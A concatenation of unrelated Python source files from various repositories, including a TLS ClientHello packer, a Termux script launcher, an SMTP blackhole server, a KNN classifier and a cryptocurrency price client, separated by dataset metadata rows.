# use the length of the client_hello_header in the handshake_header
handshake_header = TLS_Message_Packer.pack_handshake_header(
tls_message, len(handshake_content)
)
# prepend the handshake_header before the client_hello_header
message = handshake_header + handshake_content
# we keep this message because we need this one for the transcript
transcript_message = message
# application_data (x17/23)
if tls_message.message_type == b"\x17":
# additional data is a combination of the record fields of this package
# see https://tools.ietf.org/html/rfc8446#section-5.2 (the || mean concating not a logical OR operation)
additional_data = (
tls_message.message_type
+ tls_message.message_version
+ int.to_bytes(len(message))
)
# for application data we still have to encrypt the message
message = Crypto_Helper.aead_encrypt(
message,
additional_data,
client_handshake_key,
client_handshake_iv,
counter,
)
raise Exception("Not implemented yet")
# use the combined length of the handshake_header and client_hello_header in the record_header
# prepend the record_header before the message
packed = (
TLS_Message_Packer.pack_record_header(tls_message, len(message)) + message
)
packed_transcript = (
TLS_Message_Packer.pack_record_header(tls_message, len(transcript_message))
+ transcript_message
)
return packed, packed_transcript
@staticmethod
def pack_record_header(tls_message, message_length):
record_header = tls_message.message_type
record_header += tls_message.message_version
# size of handshake message that follows
record_header += message_length.to_bytes(2, tls_message.ENDINESS)
return record_header
@staticmethod
def pack_handshake_header(handshake, handshake_content_length):
handshake_header = handshake.handshake_type
# size of content of the handshakemessage that will follow
handshake_header += handshake_content_length.to_bytes(3, handshake.ENDINESS)
return handshake_header
@staticmethod
def pack_handshake_content(tls_message):
# see https://tools.ietf.org/html/rfc8446#section-4
# client_hello (x01/01)
if tls_message.handshake_type == b"\x01":
return TLS_Message_Packer.pack_client_hello(tls_message)
# finished (x14/20)
elif tls_message.handshake_type == b"\x14":
return TLS_Message_Packer.pack_verify(tls_message)
else:
raise Exception(
"Handshake type can't be packed yet: {}".format(
tls_message.handshake_type
)
)
@staticmethod
def pack_client_hello(handshake):
# see https://tools.ietf.org/html/rfc8446#section-4.1.2
# Client Version
client_hello_packed = handshake.handshake_version
# Client Random: 32 bytes of random data
client_hello_packed += handshake.client_random
# Session ID: In TLS 1.3 the session is done using PSK (pre-shared keys) mechanism, so this field is no longer needed for that purpose.
# Instead a non-empty value in this field is used to trigger "middlebox compatibility mode" which helps TLS 1.3 sessions to be disguised as resumed TLS 1.2 sessions.
if handshake.session is None:
session_length = 32
handshake.session = handshake.get_random_number(session_length).to_bytes(
session_length, handshake.ENDINESS
)
# length of the session ID
client_hello_packed += len(handshake.session).to_bytes(1, handshake.ENDINESS)
# random session ID
client_hello_packed += handshake.session
# Cipher Suites: The client provides an ordered list of which cipher suites it will support for encryption.
# The list is in the order preferred by the client, with highest preference first.
cipher_bytes = b"".join(handshake.ciphers)
# length of the ciphers in bytes
client_hello_packed += len(cipher_bytes).to_bytes(2, handshake.ENDINESS)
client_hello_packed += cipher_bytes
# Compression Methods: TLS 1.3 no longer allows compression, so this field is always a single entry with the "null" compression method which performs no change to the data.
# length of compression methods in bytes
client_hello_packed += b"\x01"
# 0x00 indicates "null" compression
client_hello_packed += b"\x00"
# Extensions: optional extensions the client can provide
extensions_header = TLS_Message_Packer.pack_extensions_header(handshake)
# length of the extensions header
client_hello_packed += len(extensions_header).to_bytes(2, handshake.ENDINESS)
client_hello_packed += extensions_header
return client_hello_packed
@staticmethod
def pack_verify(handshake):
# see https://tools.ietf.org/html/rfc8446#section-4.4.4
return handshake.client_verify_data
@staticmethod
def pack_extensions_header(handshake):
# for all extensions see https://tools.ietf.org/html/rfc8446#section-4.2
# append extensions when provided
# the first two bytes indicate the type of extension
extensions_header = b""
# Extension - Server Name (0x00 0x00): The client has provided the name of the server it is contacting, also known as SNI (Server Name Indication).
# Without this extension a HTTPS server would not be able to provide service for multiple hostnames (virtual hosts) on a single IP address because it couldn't know which hostname's certificate to send until after the TLS session was negotiated and the HTTP request was made.
# 0x00 indicates the type, which is "DNS Hostname" in this case
if handshake.server_name is not None:
extensions_header += TLS_Message_Packer.pack_extension(
handshake,
b"\x00\x00",
[{b"\x00": handshake.server_name.encode("ascii")}],
)
# Extension - Supported Groups (0x00 0x2b): The client has indicated that it supports elliptic curve (EC) cryptography for three curve types. To make this extension more generic for other cryptography types it now calls these "supported groups" instead of "supported curves".
# This list is presented in descending order of the client's preference.
extensions_header += TLS_Message_Packer.pack_extension(
handshake, b"\x00\x0a", handshake.supported_groups
)
# Extension - Signature Algorithms (0x00 0x2b): This extension indicates which signature algorithms the client supports. This can influence the certificate that the server presents to the client, as well as the signature that is sent by the server in the CertificateVerify record.
# This list is presented in descending order of the client's preference.
extensions_header += TLS_Message_Packer.pack_extension(
handshake, b"\x00\x0d", handshake.signature_algorithms
)
# Extension - Key Share (0x00 0x33): The client sends one or more public keys using an algorithm that it thinks the server will support. This allows the rest of the handshake after the ClientHello and ServerHello messages to be encrypted, unlike previous protocol versions where the handshake was sent in the clear.
extensions_header += TLS_Message_Packer.pack_extension(
handshake, b"\x00\x33", handshake.public_keys
)
# Extension - Supported Versions (0x00 0x2b): supported TLS versions, the length indicating each version entry is 1 byte (because fuck logic)
extensions_header += TLS_Message_Packer.pack_extension(
handshake, b"\x00\x2b", handshake.supported_versions, 1
)
return extensions_header
@staticmethod
def pack_extension(
handshake, extension_code, extension_values, list_entry_bytes_length=2
):
if len(extension_values) == 0:
return b""
extension_bytes = b""
for extension_value in extension_values:
# if this extension value is made up of two values, we have to add them both
if isinstance(extension_value, dict):
# retrieve the key and value form the dictionary
key = list(extension_value.keys())[0]
value = extension_value[key]
extension_value_bytes = value
# prepend the value with the length of the value in bytes
extension_value_bytes = (
len(extension_value_bytes).to_bytes(2, handshake.ENDINESS)
+ extension_value_bytes
)
# prepend with the key
extension_value_bytes = key + extension_value_bytes
# append the bytes
extension_bytes += extension_value_bytes
# if this extension value is a single value, just append it
else:
extension_bytes += extension_value
# prepend length of this list entry
extension_bytes = (
len(extension_bytes).to_bytes(list_entry_bytes_length, handshake.ENDINESS)
+ extension_bytes
)
# prepend length of all the list entries (in this case that's only one)
extension_bytes = (
len(extension_bytes).to_bytes(2, handshake.ENDINESS) + extension_bytes
)
# prepend the byte code indicating the type of extension
extension_bytes = extension_code + extension_bytes
return extension_bytes
| true |
44963dadf39ac1d4e2636655616dc48d6dd71d78 | Python | cprakashagr/PythonClass | /src/threads/simpleThread.py | UTF-8 | 794 | 3.265625 | 3 | [
"MIT"
] | permissive | import threading
import logging
import time
# logging.basicConfig(level=logging.DEBUG, format='[%(levelname)s] (%(threadName)-10s) %(message)s')
def threadFunction(c = 1):
logging.debug(c, 'Starting')
print('Thread::::::::::', threading.currentThread().getName(), end='')
print(c)
logging.debug(c, 'Exiting')
def main():
threadNameDict = {0: 'A', 1: 'B', 2: 'C'}
threads = []
for i in range(3):
# t = threading.Thread(target=threadFunction(i))
t = threading.Thread(name=threadNameDict[i], target=threadFunction(i))
t.setName(i)
threads.append(t)
threads[i].start()
# print(threads)
# for i in range(3):
# pass
for i in range(5000):
print(i, end='')
if __name__ == '__main__':
main()
| true |
d362cc25ed807d39ecd7ee5039964de9bbc0d8b0 | Python | wesleymerrick/Data-Sci-Class | /DatSciInClassStuff/Jan27.py | UTF-8 | 511 | 3.625 | 4 | [] | no_license | from __future__ import print_function
from collections import defaultdict as dd
"""
Exercises and notes from 1/27/17
"""
# Tuples - immutable lists - parentheses rather than braces
x = (1, 2, 3, 4)
# can only concatenate tuples and with tuples
# Dictionaries - stored as key-value pairs
grades = {'Joel': 80, 'Tim': 95}
print(grades['Tim'])
# EXERCISE Generate frequency count of words in a text file
word_counts = dd(int)
document = ['Alan', 'Joe', 'Alan', 'Dave', 'Goober', 'Goober', 'Goober']
word_counts
| true |
693aedfda9ed526125875419b110e627b67e112d | Python | TwitALU/Twitalu | /twitalu.py | UTF-8 | 3,094 | 3 | 3 | [] | no_license | #!/usr/bin/env python3
# 'tweet_queue' when returned will contain only the valid tweets .'work' when
# returned contains the validated commands from the scrubber. It is directly
# related to 'tweet_queue' so tweet_queue[0] and work[0] relate to the same job
# this must be maintained for the responder to work properly. work[i] has 5 parts
# work[i][0] = {the valid string as matched by the reg ex}
# work[i][1] = {the valid A part}
# work[i][2] = {the valid operation part}
# work[i][3] = {the valid B part}
# work[i][4] = {is empty but will have xxxxx placed here to indicate the solution as a string}
# work[i][5] = {is empty but will have xxxxx placed here to indicate the solution as an int}
#
import twy_twitter as twitter
import twitalu_globals as globals
import twitalu_init as init
import twitalu_OPCODE_display as OPCODE_display
import nixie
import time
if globals.no_hardware == True:
import twitalu_Math_dev as tMath
nixie.init()
else:
import twitalu_Math as tMath
init.init()
while(1):
nixie.tumble_display()
OPCODE_display.display_twit_check()
time.sleep(4)
tweets = twitter.get_tweets()
[tweet_queue, work] = twitter.input_scrub(tweets)
try:
print()
work_keys = list(work.keys())
print("Current work queue keys: {0}".format(work_keys))
final_key = work_keys[(len(work)) - 1]
except:
final_key = 0
print("Final Key: {0}".format(final_key))
print()
print("***Processing Work***")
if len(work) > 0:
for i in range(0, int(final_key) + 1):
print("|_ Job number: {0}".format(i))
OPCODE_display.display_twitalu()
nixie.tumble_display()
time.sleep(2)
try:
print("|__ Raw work: {0}".format(work[i]["0"]))
nixie.write_value(int(work[i]["1"]), 1)
time.sleep(2)
# Decode operation and display on LED matrix
if work[i]["2"] == "+":
OPCODE_display.display_ADD()
elif work[i]["2"] == "-":
OPCODE_display.display_SUB()
elif work[i]["2"] == "*":
OPCODE_display.display_MUL()
elif work[i]["2"] == "/":
OPCODE_display.display_DIV()
elif work[i]["2"] == "AND":
OPCODE_display.display_AND()
elif work[i]["2"] == "OR":
OPCODE_display.display_OR()
elif work[i]["2"] == "XOR":
OPCODE_display.display_XOR()
elif work[i]["2"] == "ROR":
OPCODE_display.display_ROR()
elif work[i]["2"] == "ROL":
OPCODE_display.display_ROL()
time.sleep(2)
nixie.write_value(int(work[i]["3"]), 2)
time.sleep(2)
print("|___ Action: Perform calculation")
result = tMath.calculate(work[i]["1"],work[i]["2"],work[i]["3"])
print("|____ Result: {0}".format(result))
print("|_____ Action: Format for insertion")
result_str = "{0}".format(result)
print("|______Result: {0}".format(result_str))
work[i]["4"] = result_str
work[i]["5"] = result
nixie.write_value(int(work[i]["5"]), 3)
time.sleep(5)
except:
print("|__ Job empty.")
print("|___ Conclusion: Job scrubbed")
else:
print("|_ Job queue empty.")
print("|__ Conclusion: No work")
twitter.send_response(tweet_queue, work, final_key) | true |
724ef11b66629217731584e65932c427b6a5328c | Python | isman7/turmyx | /turmyx.py | UTF-8 | 9,187 | 2.734375 | 3 | [] | no_license | import os
import shutil
import click
import subprocess
from configparser import ConfigParser, ExtendedInterpolation
from urllib.parse import urlparse
class TurmyxConfig(ConfigParser):
DIR_PATH = os.path.dirname(os.path.realpath(__file__))
def __init__(self):
self.config_path = os.path.join(self.DIR_PATH, "configuration.ini")
super(TurmyxConfig, self).__init__(interpolation=ExtendedInterpolation())
self.read(self.config_path)
def guess_file_command(self, file):
assert isinstance(file, str)
assert isinstance(self, ConfigParser)
file_name = os.path.basename(file)
extension = file_name.split('.')[-1]
for section in self.sections():
if "default" not in section and "editor" in section:
if extension in self[section]["extensions"].split(" "):
return section
return "editor:default"
def guess_url_command(self, url):
assert isinstance(url, str)
assert isinstance(self, ConfigParser)
url_parsed = urlparse(url)
domain = url_parsed.netloc
if not domain:
print("Failed to parse URL. Attempt default opener.")
return "opener:default"
for section in self.sections():
if "default" not in section and "opener" in section:
print(section)
if domain in self[section]["domains"].split(" "):
return section
return "opener:default"
turmyx_config_context = click.make_pass_decorator(TurmyxConfig, ensure=True)
@click.group(invoke_without_command=True)
@turmyx_config_context
def cli(config_ctx):
"""
This is turmyx! A script launcher for external files/url in Termux. Enjoy!
"""
# config_ctx.read(config_ctx.config_path)
# click.echo(click.get_current_context().get_help())
pass
@cli.command()
@click.option('--merge',
'mode',
flag_value='merge',
help="Merge new file config into the existing file.")
@click.option('--symlink',
'mode',
flag_value='symlink',
help="Symlink to the provided configuration file.")
@click.option('--view',
is_flag=True,
help="Output the actual configuration of Turmyx scripts.")
@click.argument('file',
type=click.Path(exists=True),
required=False,
)
@turmyx_config_context
def config(config_ctx, file, mode, view):
"""
Set configuration file.
You can use a mode flag to configure how to save the new configuration. Both can't be combined, so the last one
to be called will be the used by the config command.
"""
if file:
os.remove(config_ctx.config_path)
abs_path = os.path.abspath(file)
click.echo("Absolute path for provided file: {}".format(abs_path))
new_config = TurmyxConfig()
new_config.read(abs_path)
# TODO: validate this config file.
if not mode:
with open(config_ctx.config_path, "w") as config_f:
new_config.write(config_f)
click.echo("Succesfully saved into {}.".format(config_ctx.config_path))
elif mode == "merge":
# First attempt, only overriding partials:
config_ctx.read(abs_path)
with open(config_ctx.config_path, "w") as config_f:
config_ctx.write(config_f)
click.echo("Succesfully merged: {} \n into: {} \n and saved.".format(abs_path, config_ctx.config_path))
elif mode == "symlink":
os.symlink(abs_path, config_ctx.config_path)
click.echo("Succesfully linked: {} \n to: {}.".format(config_ctx.config_path, abs_path))
if view:
with open(config_ctx.config_path, 'r') as config_f:
click.echo(config_f.read())
@cli.command()
@click.argument('file',
type=click.Path(exists=True),
required=False,
)
@turmyx_config_context
def editor(config_ctx, file):
"""
Run suitable editor for any file in Termux.
You can soft-link this command with:
ln -s ~/bin/termux-file-editor $PREFIX/bin/turmyx-file-editor
"""
if isinstance(file, str):
section = config_ctx.guess_file_command(file)
command = config_ctx[section]["command"]
try:
if "command_args" in section:
arguments = config_ctx[section]["command_args"]
call_args = [command] + arguments.split(" ") + [file]
else:
call_args = [command, file]
click.echo(" ".join(call_args))
subprocess.check_call(call_args)
except FileNotFoundError:
click.echo("'{}' not found. Please check the any typo or installation.".format(command))
@cli.command()
@click.argument('url',
type=str,
required=False,
)
@turmyx_config_context
def opener(config_ctx, url):
"""
Run suitable parser for any url in Termux.
You can soft-link this command with:
ln -s ~/bin/termux-url-opener $PREFIX/bin/turmyx-url-opener
"""
if isinstance(url, str):
section = config_ctx.guess_url_command(url)
command = config_ctx[section]["command"]
try:
if "command_args" in section:
arguments = config_ctx[section]["command_args"]
call_args = [command] + arguments.split(" ") + [url]
else:
call_args = [command, url]
click.echo(" ".join(call_args))
subprocess.check_call(call_args)
except FileNotFoundError:
click.echo("'{}' not found. Please check the any typo or installation.".format(command))
@cli.command()
@click.argument('mode',
type=str,
nargs=1,
)
@click.option('--name',
type=str,
nargs=1,
help='A name for the script configuration, otherwise it will be guessed from script path.'
)
@click.option('--default',
is_flag=True,
help='The script will be saved as default one for the given mode, --name option and any argument in '
'CASES_LIST would be ignored.'
)
@click.argument('script',
type=str,
required=True)
@click.argument('cases_list',
type=str,
nargs=-1,
required=False,
)
@turmyx_config_context
def add(config_ctx, script, mode, cases_list, name, default):
"""
Add a new script configuration.
Examples:
turmyx add editor nano txt md ini
turmyx add --name radare editor r2 exe
turmyx add opener youtube-dl youtube.com youtu.be
turmyx add --default opener qr
Adds a new script to Turmyx, the configuration is setted inline by an OPTION --name, otherwhise the name is
guessed from script name. The argument MODE has to be 'editor' or 'opener' and sets the run environment of the
script. SCRIPT must be a valid path to the script/program, and must be executable, otherwise when executing it
would lead to an exception. Finally, the CASES_LIST will contain a list of extensions or domains to be used along with the script.
"""
if mode not in ("opener", "editor"):
click.echo("{} is not 'opener' or 'editor' mode.".format(mode))
return
click.echo("Evaluating script: {}".format(script))
script_path = shutil.which(script)
if script_path:
script_path = os.path.abspath(script_path)
click.echo("Absolute path found for script: {}".format(script_path))
else:
click.echo("Given script not found or not executable.")
return
basename = os.path.basename(script_path)
if not default:
section = "{}:{}".format(mode, name if name else basename)
else:
section = "{}:default".format(mode)
config_ctx[section] = {}
args_command = [section, "command", script_path]
config_ctx.set(*args_command)
if cases_list and not default:
args_cases = [section, "extensions" if mode == "editor" else "domains", ' '.join(cases_list)]
config_ctx.set(*args_cases)
with open(config_ctx.config_path, "w") as config_f:
config_ctx.write(config_f)
@cli.command()
@click.argument('script',
type=str,
required=True)
@turmyx_config_context
def remove(config_ctx, script):
"""
Removes script configuration.
"""
if config_ctx.remove_section(script):
click.echo("Script configuration successfully removed!")
with open(config_ctx.config_path, 'w') as config_f:
config_ctx.write(config_f)
else:
click.echo("Configuration not found.")
section_guesses = []
for section in config_ctx.sections():
if script in section:
section_guesses.append(section)
if section_guesses:
click.echo("Maybe you want to say:\n{}".format(
"\n".join(section_guesses)
))
| true |
cb45c63c336d5544c893c166569de62ed055663f | Python | mkirsch42/SeniorDesign_WeaponDetection | /src/objdet/handlers/logger.py | UTF-8 | 1,162 | 2.546875 | 3 | [] | no_license | from abc import abstractmethod
import cv2
from ..detection.results import BoundingBox, DetectionResult
from .detection_handler import DetectionHandler
import json
from pathlib import Path
class Logger(DetectionHandler):
@abstractmethod
def __iter__(self):
pass
@abstractmethod
def __len__(self):
pass
class FilesystemLogger(Logger):
def __init__(self, base_dir, log_file='_log.json'):
self._path = Path(base_dir)
self._path.mkdir(exist_ok=True)
self._logfile = self._path / log_file
try:
with self._logfile.open() as f:
self._json = json.load(f)
except FileNotFoundError:
self._json = {'detections':[]}
def __iter__(self):
return iter(self.parse_detection(obj) for obj in self._json['detections'])
def __len__(self):
return len(self._json['detections'])
def parse_detection(self, obj):
image = cv2.imread(str(self._path / obj['image']))
bboxes = [BoundingBox(**bbox) for bbox in obj['bboxes']]
return DetectionResult(image, bboxes)
async def on_detect(self, result):
pass | true |
3930e3e0a25fe04f589711ab1616bf0edc81792c | Python | amadu80/blackhole | /blackhole/connection.py | UTF-8 | 4,471 | 2.59375 | 3 | [
"BSD-3-Clause"
] | permissive | import errno
import socket
import ssl
import sys
from tornado import iostream
from tornado.options import options
from blackhole.state import MailState
from blackhole.data import response
from blackhole.opts import ports
from blackhole.ssl_utils import sslkwargs
from blackhole.log import log
def sockets():
"""
Spawn a looper which loops over socket data and creates
the sockets.
It should only ever loop over a maximum of two - standard (std)
and SSL (ssl).
This way we're able to detect incoming connection vectors and
handle them accordingly.
A dictionary of sockets is then returned to later be added to
the IOLoop.
"""
socks = {}
for s in ports():
try:
port = options.ssl_port if s == "ssl" else options.port
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setblocking(0)
sock.bind((options.host, port))
sock.listen(5000)
socks[s] = sock
except socket.error, e:
if e.errno == 13:
log.error("Permission denied, could not bind to %s:%s" %
(options.host, port))
else:
log.error(e)
sys.exit(1)
return socks
def connection_stream(connection):
"""
Detect which socket the connection is being made on,
create and iostream for the connection, wrapping it
in SSL if connected over the SSL socket.
"""
if connection.getsockname()[1] == options.ssl_port and options.ssl:
try:
ssl_connection = ssl.wrap_socket(connection, **sslkwargs)
except (ssl.SSLError, socket.error), e:
if e.errno == ssl.SSL_ERROR_EOF or e.errno == errno.ECONNABORTED:
ssl_connection.close()
return
else:
raise
# Do a nasty blanket Exception until SSL exceptions are fully known
try:
return iostream.SSLIOStream(ssl_connection)
except Exception, e:
log.error(e)
ssl_connection.close()
return
else:
return iostream.IOStream(connection)
def handle_command(line, stream, mail_state):
"""Handle each SMTP command as it's sent to the server"""
if mail_state.reading:
resp = None
# Not exactly nice but it's only way I could safely figure
# out if it was the \n.\n
if line[0] == "." and len(line) == 3 and ord(line[0]) == 46:
mail_state.reading = False
resp = response()
elif any(line.lower().startswith(e) for e in ['helo', 'ehlo',
'mail from',
'rcpt to', 'rset']):
resp = response(250)
elif line.lower().startswith("starttls"):
resp = response(220)
elif line.lower().startswith("vrfy"):
resp = response(252)
elif line.lower().startswith("quit"):
resp = response(221)
stream.write(resp)
stream.close()
return
elif line.lower().startswith("data"):
resp = response(354)
mail_state.reading = True
else:
resp = response(500)
if resp:
stream.write(resp)
def connection_ready(sock, fd, events):
"""
Accepts the socket connections and passes them off
to be handled.
"""
while True:
try:
connection, address = sock.accept()
except socket.error, e:
if e.errno not in (errno.EWOULDBLOCK, errno.EAGAIN):
raise
return
connection.setblocking(0)
stream = connection_stream(connection)
if not stream:
return
mail_state = MailState()
# Sadly there is nothing I can do about the handle and loop
# fuctions. They have to exist within connection_ready
def handle(line):
"""
Handle a line of socket data, figure out if
it's a valid SMTP keyword and handle it
accordingly.
"""
handle_command(line, stream, mail_state)
loop()
def loop():
"""
Loop over the socket data until we receive
a newline character (\n)
"""
stream.read_until("\n", handle)
stream.write(response(220))
loop()
| true |
c88e2f78a7c115172112df48043eb7a87ddb464f | Python | stemkoski/BAGEL-Python | /BAGEL-Python/src/Texture.py | UTF-8 | 589 | 2.984375 | 3 | [] | no_license | import pygame
from Rectangle import *
class Texture(object):
def __init__(self):
self.image = None
self.width = 0
self.height = 0
# self.region = Rectangle()
@staticmethod
def load(filename):
tex = Texture()
tex.image = pygame.image.load(filename)
tex.width = tex.image.get_width()
tex.height = tex.image.get_height()
return tex
def clone(self):
tex = Texture()
tex.image = self.image
tex.width = self.width
tex.height = self.height
return tex
| true |
4ec8d3c9da91b54215d4fd1507c037a627ffb15f | Python | berkott/mClasses | /class4.py | UTF-8 | 398 | 4.75 | 5 | [] | no_license | # Indexing: 0 to length -1
# 0123456789
# 0 -1
x = "I like pie"
# Loop through a string with a while loop
i = 0
while i < len(x):
print(x[i])
i += 1
# Regular for loop can access the index values
for i in range(len(x)):
print(i)
print(x[i])
print("=======")
# For each loop only has the elements
for char in x:
print(char)
print(x[2:7:2])
print(len(x[1:4]))
| true |
5b9d77b28969482a609423ab53f56d52aea86f32 | Python | ljt270864457/algorithm | /knn/KNN/knn.py | UTF-8 | 2,759 | 3.34375 | 3 | [] | no_license | # coding: utf-8
from __future__ import division
import pandas as pd
from collections import Counter
class Preprossing(object):
def __init__(self, data_path, train_percent):
print 'data preprossing...'
self.data_path = data_path
self.train_percent = train_percent
def readData(self):
return pd.read_csv(self.data_path, header=None, sep=',')
def cleanData(self, df):
'''
最后一列g:1 b:0
所有的列的数据缩放至0-1
'''
df.iloc[:, -1] = df.iloc[:, -1].apply(lambda x: 1 if x == 'g' else 0)
df.iloc[:, :-1] = df.iloc[:, :-1].apply(lambda x: (x - x.min()) / (x.max() -
x.min()) if x.max() != x.min() else x)
return df
def splitData(self, df):
train_rows_count = int(df.shape[0] * self.train_percent)
train_x = df.iloc[:train_rows_count, :-1]
train_y = df.iloc[:train_rows_count, -1]
test_x = df.iloc[train_rows_count:, :-1]
test_y = df.iloc[train_rows_count:, -1]
return train_x, test_x, train_y, test_y
class KNN(object):
def __init__(self, train_x, train_y, test_x, test_y, K=3):
self.train_x = train_x
self.train_y = train_y
self.test_x = test_x
self.test_y = test_y
self.K = K
self.train_rows = self.train_x.shape[0]
self.test_rows = self.test_x.shape[0]
def fit(self):
'''
使用欧氏距离进行计算,返回排序之后的距离
'''
print 'fiting ......'
result_list = []
for i, row in self.test_x.iterrows():
self.train_x['distance'] = self.train_x.apply(
lambda x: (sum((row - self.test_x.loc[i]) ** 2) ** 0.5), axis=1)
top_K = self.train_x.sort_values(['distance']).iloc[:self.K, ]
tags = list(self.train_y[list(top_K.index)])
result_tag = Counter(tags).most_common(1)
result_list.append(result_tag[0][0])
result_dataFrame = pd.DataFrame({'actual': list(self.test_y), 'predict': result_list})
return result_dataFrame
def validate(self, df):
new_df = df[df['actual'] == df['predict']]
correct_count = new_df.shape[0]
accuracy = (correct_count / self.test_rows) * 100
print 'accuracy percent is {0}%'.format(round(accuracy, 2))
if __name__ == '__main__':
data_reader = Preprossing('./ionosphere.data', 0.7)
data = data_reader.readData()
cleanedData = data_reader.cleanData(data)
train_x, test_x, train_y, test_y = data_reader.splitData(cleanedData)
knn = KNN(train_x, train_y, test_x, test_y)
df = knn.fit()
print df
knn.validate(df)
| true |
79d8ef2399a49d68d5c304abcfe9b04479be2af2 | Python | zycode1561/PythonLearning | /include/ML/wu_exe/commons/test1.py | UTF-8 | 467 | 2.765625 | 3 | [] | no_license | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
"""
__author__ = 'Zy_Code'
# coding=utf-8
from scipy.optimize import minimize
import numpy as np
# demo 1
# 计算 1/x+x 的最小值
def fun(args):
a = args
v = lambda x: a / x[0] + x[0]
return v
if __name__ == "__main__":
args = (1) # a
x0 = np.asarray((2)) # 初始猜测值
res = minimize(fun(args), x0, method='SLSQP')
print(res.fun)
print(res.success)
print(res.x) | true |
35a7e83d1ea768e32abe7c31fde7baaab4cf60ac | Python | subreena10/loop | /s2q5meraki.py | UTF-8 | 105 | 3.5625 | 4 | [] | no_license |
i=1
sum=0
while i<=6:
n=int(input("Enter a number:- "))
sum=sum+n
print(sum)
i+=1
| true |
46e1400019d78496039c74995776875181077bc4 | Python | finddeniseonline/sea-c34-python.old | /students/MichaelHazani/session05/test_arguments.py | UTF-8 | 200 | 2.625 | 3 | [] | no_license | import arguments
localx = arguments.x
def test_tupleexperiment():
"""test method tupleexperiment in the arguemnts.py module"""
assert(arguments.tupleexperiment(localx) == (4, 3, 4, 5, 6))
| true |
b730a8c31fac5e5a861ebfb0770fe15641c3f5f4 | Python | OrangeHoodie240/SB_24_1_15 | /forms.py | UTF-8 | 1,311 | 3.078125 | 3 | [] | no_license | from flask_wtf import FlaskForm
from wtforms import IntegerField, StringField, BooleanField, SelectField, RadioField
from wtforms.validators import InputRequired, AnyOf, URL, Optional, NumberRange
valid_pets = ['cat', 'dog', 'porcupine']
class PetForm(FlaskForm):
""" Form for adding new pet """
name = StringField("Name: ", validators=[InputRequired(message="Pet Name Required")])
species = SelectField("Species: ", choices=valid_pets, validators=[InputRequired(message="Pet Species Required"), AnyOf(valid_pets)])
photo_url = StringField("Photo Url: ", validators=[Optional(), URL(message='Not valid url')])
notes = StringField("Notes :")
age = IntegerField("Age: ", validators=[NumberRange(min=0, max=30), Optional()])
class EditForm(FlaskForm):
""" Form for editing pet """
photo_url = StringField("Photo Url: ", validators=[Optional(), URL()])
notes = StringField("Notes :")
available = RadioField("Available: ", choices=[(True, 'yes'), (False, 'no')])
@classmethod
def fill_pet(cls, form, pet):
""" method for placing form data into pet object """
print(form.available.data)
pet.notes = form.notes.data
pet.available = True if form.available.data.startswith('T') else False
pet.photo_url = form.photo_url.data | true |
e2cc70ad11335d8ea043214eed38e220748b0307 | Python | mcelhennyi/CryptoTaxBot | /FairMarketValue/cryptocompare_interface.py | UTF-8 | 8,423 | 2.90625 | 3 | [
"MIT"
] | permissive | from FairMarketValue import FairMarketValue
from FairMarketValue.fmv_buffer import FmvBuffer
import http.client
import json
import time
import datetime
class CryptoCompareInterface(FairMarketValue):
def __init__(self):
FairMarketValue.__init__(self, None, None)
# Buffer to speed up average querying
self._buf = FmvBuffer()
def get_average_usd_price_of_btc(self, epoch_millis):
symbol = 'btc'
date_string = self._get_date_string(epoch_millis)
ret_avg = self._buf.get_average(symbol, date_string)
if ret_avg is not None:
# print("Average found in buffer")
return ret_avg
else:
# print("Requesting average")
avg = float(self._request_day_average(epoch_seconds=epoch_millis/1000, from_sym=symbol, to_sym='usd')['USD'])
assert self._buf.buffer_average(symbol, date_string, avg)
return avg
def get_average_usd_price_of_bnb(self, epoch_millis):
symbol = 'bnb'
date_string = self._get_date_string(epoch_millis)
ret_avg = self._buf.get_average(symbol, date_string)
if ret_avg is not None:
# print("Average found in buffer")
return ret_avg
else:
# print("Requesting average")
avg = float(self._request_day_average(epoch_seconds=epoch_millis/1000, from_sym=symbol, to_sym='usd')['USD'])
assert self._buf.buffer_average(symbol, date_string, avg)
return avg
def get_average_usd_price_of_(self, symbol, epoch_millis):
date_string = self._get_date_string(epoch_millis)
ret_avg = self._buf.get_average(symbol, date_string)
if ret_avg is not None:
# print("Average found in buffer")
return ret_avg
else:
# print("Requesting average")
avg = float(self._request_day_average(epoch_seconds=epoch_millis/1000, from_sym=symbol, to_sym='usd')['USD'])
assert self._buf.buffer_average(symbol, date_string, avg)
return avg
def get_average_btc_price_of_(self, symbol, epoch_millis):
# WARNING Don't buffer, because buffer assumes USD
# print("Requesting average")
return float(self._request_day_average(epoch_seconds=epoch_millis/1000, from_sym=symbol, to_sym='btc')['BTC'])
def _request_day_average(self, epoch_seconds, from_sym, to_sym='BTC'):
# https://min-api.cryptocompare.com/data/dayAvg?fsym=BTC&tsym=USD&toTs=1517460356&extraParams=your_app_name
connection = http.client.HTTPSConnection('min-api.cryptocompare.com', timeout=2)
connection.request('GET', '/data/dayAvg?fsym=' + str(from_sym).upper() + '&tsym=' + to_sym.upper() +
'&toTs=' + str(int(epoch_seconds)) + '&extraParams=CryptoTaxBot')
response = connection.getresponse()
if response.status is not 200:
raise Exception("Request not good: " + str(response.status))
return json.loads(response.read().decode('utf-8'))
def _get_date_string(self, epoch_millis):
st = datetime.datetime.fromtimestamp(epoch_millis/1000).strftime('%Y-%m-%d')
return st
if __name__ == "__main__":
cci = CryptoCompareInterface()
timenow = time.time()
time_then = timenow #- (86400/3)
print("then: " + str(time_then) + ", time now: " + str(timenow))
data = cci._request_day_average(time_then, 'BTC', to_sym="usd")
# for i in data:
print(data)
# print(time.strftime('%Y-%m-%d', time.gmtime(i['time'])))
print('\n')
"""
Day Avg Documentation:
https://min-api.cryptocompare.com/
"DayAvg": {
"Simple": "https://min-api.cryptocompare.com/data/dayAvg?fsym=BTC&tsym=USD&extraParams=your_app_name",
"Info": {
"Description": "Get day average price. The values are based on hourly vwap data and the average can be calculated in different waysIt uses BTC conversion if data is not available because the coin is not trading in the specified currency. If tryConversion is set to false it will give you the direct data. If no toTS is given it will automatically do the current day. Also for different timezones use the UTCHourDiff paramThe calculation types are: VWAP - a VWAP of the hourly close price,MidHighLow - the average between the 24 H high and low.VolFVolT - the total volume from / the total volume to (only avilable with tryConversion set to false so only for direct trades but the value should be the most accurate average day price) ",
"Parameters": [
{
"name": "tryConversion",
"type": "bool",
"required": false,
"defaultVal": true,
"info": "If set to false, it will try to get values without using any conversion at all"
},
{
"name": "fsym",
